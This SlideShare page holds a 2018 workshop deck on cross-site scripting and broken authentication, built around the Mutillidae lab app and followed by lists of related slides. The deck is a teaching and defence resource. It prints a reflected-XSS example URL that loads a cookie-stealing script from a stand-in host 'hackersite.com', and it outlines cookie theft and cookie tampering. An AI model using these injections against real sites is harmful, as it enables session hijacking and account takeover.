SlideShare a Scribd company logo

XSS and Broken authentication

A
AgalyaD

XSS and broken authentication vulnerabilities are part of OWASP top-10 security risks since 2010. Lets learn in a hands-on way, how to hack an application exposing these vulnerabilities and also to protect our App against these attacks.

1 of 33
Download to read offline
Cross-Site Scripting & Broken Authentication VodQA Chennai— September 2018 Abinaya V and Agalya D
● What is XSS? ● Types of XSS with hands-on ● Cookie stealing ● Prevention of XSS ● Broken Authentication ● Privilege escalation ● Brutal force ● Mitigation of Broken authentication Agenda
Cross-Site Scripting A7:2017-Cross-Site Scripting (XSS) A3:2013-Cross-Site Scripting (XSS)
- Client side code injection attack - Injecting malicious code into a vulnerable web application What is XSS ?
- Steal user’s cookie for the domain - Scrape or modify the content bypassing Same origin policy - Trojan horse programs could be injected - Gather information from victims browser: account, cookies, other sensitive information Consequences
Sites hacked!
XSS in ebay
Types of XSS - Reflected (non-persistent) - Stored (persistent) - DOM based XSS
Reflected XSS Example: http://forum.com?q=news<script%20src="http://hackersite.com/authstealer.js"
HANDS-ON
SET-UP INSTRUCTIONS: Participants using the Mutillidae Docker image: 1. Install docker 2. Install mutillidae app using docker command docker run -d -p 80:80 -p 443:443 --name owasp17 bltsec/mutillidae-docker 3. Open mutillidae App: http://localhost/mutillidae/ First time, it will redirected to http://localhost/mutillidae/database-offline.php 4. Click “setup/reset the DB” to setup database Participants Virtualbox OVA image: 1. Access the app using the url: http://192.168.56.180 /mutillidae/index.php? Change Browser proxy settings: Firefox--> Preferences --> Network proxy --> Settings --> ‘Manual Proxy Configuration’
“ > <a ; // % Attack strings
1. Injects bad script 3. Receives bad script 2. Request content 4. Steal valuable data Stored XSS
HANDS-ON
Cookie stealing
Server to receive cookies when the malicious script is run Attacker’s server Malicious Script is run when the vulnerable page loads Victim’s web application
How to prevent? - Vigilance - Sanitisation or validation of user input - Use HttpOnly flag in the HTTP response header
Broken Authentication A2:2017-Broken Authentication
These types of weaknesses can allow an attacker to either capture or bypass the authentication methods that are used by a web application. The goal of an attack is to take over one or more accounts . ● User authentication credentials are not protected when stored. ● Predictable login credentials ● Passwords, session IDs, and other credentials are sent over unencrypted connections. ● Application’s timeout is not set properly ● URL rewriting http://site.com/sale;jsessionid=2P9GC2JSNDLPS KHCJUN5TU?dest=Europe
LinkedIn Data Breach: 50 easily guessed passwords made up more than 2.2 million of the 117 million encrypted passwords exposed in the breach Passwords were stored in SHA1 with no salting Source:LeakedSource
Privilege escalation via cookie tampering
Prevention - Implement multi-factor authentication to prevent automated, credential stuffing, brute force, and stolen credential reuse attacks - Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force, or other attacks are detected. - Do not deploy with any default credentials, particularly for admin users - Implement weak-password checks - Have password rotation policies - Session IDs should not be in the URL, be securely stored and invalidated after logout, idle, and absolute timeouts.
References - https://www.owasp.org/index.php - https://sourceforge.net/projects/mutillidae/ - https://www.cvedetails.com/about-contact.php - https://github.com/danielmiessler/SecLists/tree/master/Passwords/
THANKS Email abinayav@thoughtworks.com agalyad@thoughtworks.com

Recommended

Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
n|u - The Open Security Community
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
What is xss, blind xss and xploiting google gadgets
What is xss, blind xss and xploiting google gadgetsWhat is xss, blind xss and xploiting google gadgets
What is xss, blind xss and xploiting google gadgets
Ziv Ginsberg
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Sandeep Kumbhar
 
Swg
SwgSwg
Swg
itian-f5
 
Secure Code Warrior - Authentication
Secure Code Warrior - AuthenticationSecure Code Warrior - Authentication
Secure Code Warrior - Authentication
Secure Code Warrior
 
Top 10 web server security flaws
Top 10 web server security flawsTop 10 web server security flaws
Top 10 web server security flaws
tobybear30
 
Web hack & attacks
Web hack & attacksWeb hack & attacks
Web hack & attacks
Apurva Dhanwantri - CISA ,SCJP,C|EH, ISO/IEC 27001 LA,CPISI
 

Recommended

Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
n|u - The Open Security Community
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
What is xss, blind xss and xploiting google gadgets
What is xss, blind xss and xploiting google gadgetsWhat is xss, blind xss and xploiting google gadgets
What is xss, blind xss and xploiting google gadgets
Ziv Ginsberg
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Sandeep Kumbhar
 
Swg
SwgSwg
Swg
itian-f5
 
Secure Code Warrior - Authentication
Secure Code Warrior - AuthenticationSecure Code Warrior - Authentication
Secure Code Warrior - Authentication
Secure Code Warrior
 
Top 10 web server security flaws
Top 10 web server security flawsTop 10 web server security flaws
Top 10 web server security flaws
tobybear30
 
Web hack & attacks
Web hack & attacksWeb hack & attacks
Web hack & attacks
Apurva Dhanwantri - CISA ,SCJP,C|EH, ISO/IEC 27001 LA,CPISI
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTION
umme ayesha
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site Security
Steven Cahill
 
Type of Cyber Attacks
Type of Cyber AttacksType of Cyber Attacks
Type of Cyber Attacks
SOCRadar Inc
 
Current Issue: February 2020, Volume 10, Number 1 --- Table of Contents
Current Issue: February 2020, Volume 10, Number 1 --- Table of ContentsCurrent Issue: February 2020, Volume 10, Number 1 --- Table of Contents
Current Issue: February 2020, Volume 10, Number 1 --- Table of Contents
IJCSEA Journal
 
WHS-hackability-Index-083013
WHS-hackability-Index-083013WHS-hackability-Index-083013
WHS-hackability-Index-083013
Janis Weiss
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
HarishKumar1779
 
Phishing detection & protection scheme
Phishing detection & protection schemePhishing detection & protection scheme
Phishing detection & protection scheme
Mussavir Shaikh
 
The Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersThe Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security Providers
United Security Providers AG
 
Ransomware
RansomwareRansomware
Ransomware
DeepakKumar4980
 
Threat Modeling and OWASP Top 10 (2017 rc1)
Threat Modeling and OWASP Top 10 (2017 rc1)Threat Modeling and OWASP Top 10 (2017 rc1)
Threat Modeling and OWASP Top 10 (2017 rc1)
Mike Tetreault
 
Information security
Information securityInformation security
Information security
Sathyanarayana Panduranga
 
Web security presentation
Web security presentationWeb security presentation
Web security presentation
John Staveley
 
Most Common Application Level Attacks
Most Common Application Level AttacksMost Common Application Level Attacks
Most Common Application Level Attacks
EC-Council
 
Introduction to Web Server Security
Introduction to Web Server SecurityIntroduction to Web Server Security
Introduction to Web Server Security
JITENDRA KUMAR PATEL
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
Secure Code Warrior
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
Edouard de Lansalut
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on it
WSO2
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web Apps
TechWell
 
C01461422
C01461422C01461422
C01461422
IOSR Journals
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
Pankaj Kumar Sharma
 
OWASP Top 10
OWASP Top 10OWASP Top 10
OWASP Top 10
Arthur Shvetsov
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
Rob Ragan
 

More Related Content

What's hot

PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTION
umme ayesha
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site Security
Steven Cahill
 
Type of Cyber Attacks
Type of Cyber AttacksType of Cyber Attacks
Type of Cyber Attacks
SOCRadar Inc
 
Current Issue: February 2020, Volume 10, Number 1 --- Table of Contents
Current Issue: February 2020, Volume 10, Number 1 --- Table of ContentsCurrent Issue: February 2020, Volume 10, Number 1 --- Table of Contents
Current Issue: February 2020, Volume 10, Number 1 --- Table of Contents
IJCSEA Journal
 
WHS-hackability-Index-083013
WHS-hackability-Index-083013WHS-hackability-Index-083013
WHS-hackability-Index-083013
Janis Weiss
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
HarishKumar1779
 
Phishing detection & protection scheme
Phishing detection & protection schemePhishing detection & protection scheme
Phishing detection & protection scheme
Mussavir Shaikh
 
The Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersThe Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security Providers
United Security Providers AG
 
Ransomware
RansomwareRansomware
Ransomware
DeepakKumar4980
 
Threat Modeling and OWASP Top 10 (2017 rc1)
Threat Modeling and OWASP Top 10 (2017 rc1)Threat Modeling and OWASP Top 10 (2017 rc1)
Threat Modeling and OWASP Top 10 (2017 rc1)
Mike Tetreault
 
Information security
Information securityInformation security
Information security
Sathyanarayana Panduranga
 
Web security presentation
Web security presentationWeb security presentation
Web security presentation
John Staveley
 
Most Common Application Level Attacks
Most Common Application Level AttacksMost Common Application Level Attacks
Most Common Application Level Attacks
EC-Council
 
Introduction to Web Server Security
Introduction to Web Server SecurityIntroduction to Web Server Security
Introduction to Web Server Security
JITENDRA KUMAR PATEL
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
Secure Code Warrior
 

What's hot (15)

PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTION
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site Security
 
Type of Cyber Attacks
Type of Cyber AttacksType of Cyber Attacks
Type of Cyber Attacks
 
Current Issue: February 2020, Volume 10, Number 1 --- Table of Contents
Current Issue: February 2020, Volume 10, Number 1 --- Table of ContentsCurrent Issue: February 2020, Volume 10, Number 1 --- Table of Contents
Current Issue: February 2020, Volume 10, Number 1 --- Table of Contents
 
WHS-hackability-Index-083013
WHS-hackability-Index-083013WHS-hackability-Index-083013
WHS-hackability-Index-083013
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Phishing detection & protection scheme
Phishing detection & protection schemePhishing detection & protection scheme
Phishing detection & protection scheme
 
The Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersThe Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security Providers
 
Ransomware
RansomwareRansomware
Ransomware
 
Threat Modeling and OWASP Top 10 (2017 rc1)
Threat Modeling and OWASP Top 10 (2017 rc1)Threat Modeling and OWASP Top 10 (2017 rc1)
Threat Modeling and OWASP Top 10 (2017 rc1)
 
Information security
Information securityInformation security
Information security
 
Web security presentation
Web security presentationWeb security presentation
Web security presentation
 
Most Common Application Level Attacks
Most Common Application Level AttacksMost Common Application Level Attacks
Most Common Application Level Attacks
 
Introduction to Web Server Security
Introduction to Web Server SecurityIntroduction to Web Server Security
Introduction to Web Server Security
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
 

Similar to XSS and Broken authentication

Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
Edouard de Lansalut
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on it
WSO2
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web Apps
TechWell
 
C01461422
C01461422C01461422
C01461422
IOSR Journals
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
Pankaj Kumar Sharma
 
OWASP Top 10
OWASP Top 10OWASP Top 10
OWASP Top 10
Arthur Shvetsov
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
Rob Ragan
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
Andre Van Klaveren
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...
Cognizant
 
Novinky F5 pro rok 2018
Novinky F5 pro rok 2018Novinky F5 pro rok 2018
Novinky F5 pro rok 2018
MarketingArrowECS_CZ
 
5 step plan to securing your APIs
5 step plan to securing your APIs5 step plan to securing your APIs
5 step plan to securing your APIs
💻 Javier Garza
 
Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016
Sumanth Damarla
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
SilverGold16
 
Welcome to International Journal of Engineering Research and Development (IJERD)
Welcome to International Journal of Engineering Research and Development (IJERD)Welcome to International Journal of Engineering Research and Development (IJERD)
Welcome to International Journal of Engineering Research and Development (IJERD)
IJERD Editor
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
Victor Bucutea
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Web application security I
Web application security IWeb application security I
Web application security I
Md Syed Ahamad
 
Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...
Greg Sohl
 

Similar to XSS and Broken authentication (20)

Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on it
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web Apps
 
C01461422
C01461422C01461422
C01461422
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
 
OWASP Top 10
OWASP Top 10OWASP Top 10
OWASP Top 10
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...A Multidimensional View of Critical Web Application Security Risks: A Novel '...
A Multidimensional View of Critical Web Application Security Risks: A Novel '...
 
Novinky F5 pro rok 2018
Novinky F5 pro rok 2018Novinky F5 pro rok 2018
Novinky F5 pro rok 2018
 
5 step plan to securing your APIs
5 step plan to securing your APIs5 step plan to securing your APIs
5 step plan to securing your APIs
 
Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016Securing the Web @RivieraDev2016
Securing the Web @RivieraDev2016
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
 
Welcome to International Journal of Engineering Research and Development (IJERD)
Welcome to International Journal of Engineering Research and Development (IJERD)Welcome to International Journal of Engineering Research and Development (IJERD)
Welcome to International Journal of Engineering Research and Development (IJERD)
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
 
Web application security I
Web application security IWeb application security I
Web application security I
 
Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...
 

Recently uploaded

Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 
Public CyberSecurity Awareness Presentation 2024.pptx
Public CyberSecurity Awareness Presentation 2024.pptxPublic CyberSecurity Awareness Presentation 2024.pptx
Public CyberSecurity Awareness Presentation 2024.pptx
marufrahmanstratejm
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Tatiana Kojar
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
Chart Kalyan
 
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframeDigital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Precisely
 
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
ScyllaDB
 
dbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdfdbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
Shinana2
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
Edge AI and Vision Alliance
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 
Trusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process MiningTrusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process Mining
LucaBarbaro3
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
Alex Pruden
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
Hiroshi SHIBATA
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
Tatiana Kojar
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
Ivanti
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
Postman
 

Recently uploaded (20)

Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
Public CyberSecurity Awareness Presentation 2024.pptx
Public CyberSecurity Awareness Presentation 2024.pptxPublic CyberSecurity Awareness Presentation 2024.pptx
Public CyberSecurity Awareness Presentation 2024.pptx
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
 
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframeDigital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
 
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
 
dbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdfdbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 
Trusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process MiningTrusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process Mining
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
WeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation TechniquesWeTestAthens: Postman's AI & Automation Techniques
WeTestAthens: Postman's AI & Automation Techniques
 

XSS and Broken authentication

  • 1. Cross-Site Scripting & Broken Authentication VodQA Chennai— September 2018 Abinaya V and Agalya D
  • 2. ● What is XSS? ● Types of XSS with hands-on ● Cookie stealing ● Prevention of XSS ● Broken Authentication ● Privilege escalation ● Brutal force ● Mitigation of Broken authentication Agenda
  • 3. Cross-Site Scripting A7:2017-Cross-Site Scripting (XSS) A3:2013-Cross-Site Scripting (XSS)
  • 4.
  • 5. - Client side code injection attack - Injecting malicious code into a vulnerable web application What is XSS ?
  • 6.
  • 7. - Steal user’s cookie for the domain - Scrape or modify the content bypassing Same origin policy - Trojan horse programs could be injected - Gather information from victims browser: account, cookies, other sensitive information Consequences
  • 10. Types of XSS - Reflected (non-persistent) - Stored (persistent) - DOM based XSS
  • 13. SET-UP INSTRUCTIONS: Participants using the Mutillidae Docker image: 1. Install docker 2. Install mutillidae app using docker command docker run -d -p 80:80 -p 443:443 --name owasp17 bltsec/mutillidae-docker 3. Open mutillidae App: http://localhost/mutillidae/ First time, it will redirected to http://localhost/mutillidae/database-offline.php 4. Click “setup/reset the DB” to setup database Participants Virtualbox OVA image: 1. Access the app using the url: http://192.168.56.180 /mutillidae/index.php? Change Browser proxy settings: Firefox--> Preferences --> Network proxy --> Settings --> ‘Manual Proxy Configuration’
  • 15. 1. Injects bad script 3. Receives bad script 2. Request content 4. Steal valuable data Stored XSS
  • 18. Server to receive cookies when the malicious script is run Attacker’s server Malicious Script is run when the vulnerable page loads Victim’s web application
  • 19. How to prevent? - Vigilance - Sanitisation or validation of user input - Use HttpOnly flag in the HTTP response header
  • 21.
  • 22. These types of weaknesses can allow an attacker to either capture or bypass the authentication methods that are used by a web application. The goal of an attack is to take over one or more accounts . ● User authentication credentials are not protected when stored. ● Predictable login credentials ● Passwords, session IDs, and other credentials are sent over unencrypted connections. ● Application’s timeout is not set properly ● URL rewriting http://site.com/sale;jsessionid=2P9GC2JSNDLPS KHCJUN5TU?dest=Europe
  • 23. LinkedIn Data Breach: 50 easily guessed passwords made up more than 2.2 million of the 117 million encrypted passwords exposed in the breach Passwords were stored in SHA1 with no salting Source:LeakedSource
  • 24. Privilege escalation via cookie tampering
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
  • 30.
  • 31. Prevention - Implement multi-factor authentication to prevent automated, credential stuffing, brute force, and stolen credential reuse attacks - Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force, or other attacks are detected. - Do not deploy with any default credentials, particularly for admin users - Implement weak-password checks - Have password rotation policies - Session IDs should not be in the URL, be securely stored and invalidated after logout, idle, and absolute timeouts.
  • 32. References - https://www.owasp.org/index.php - https://sourceforge.net/projects/mutillidae/ - https://www.cvedetails.com/about-contact.php - https://github.com/danielmiessler/SecLists/tree/master/Passwords/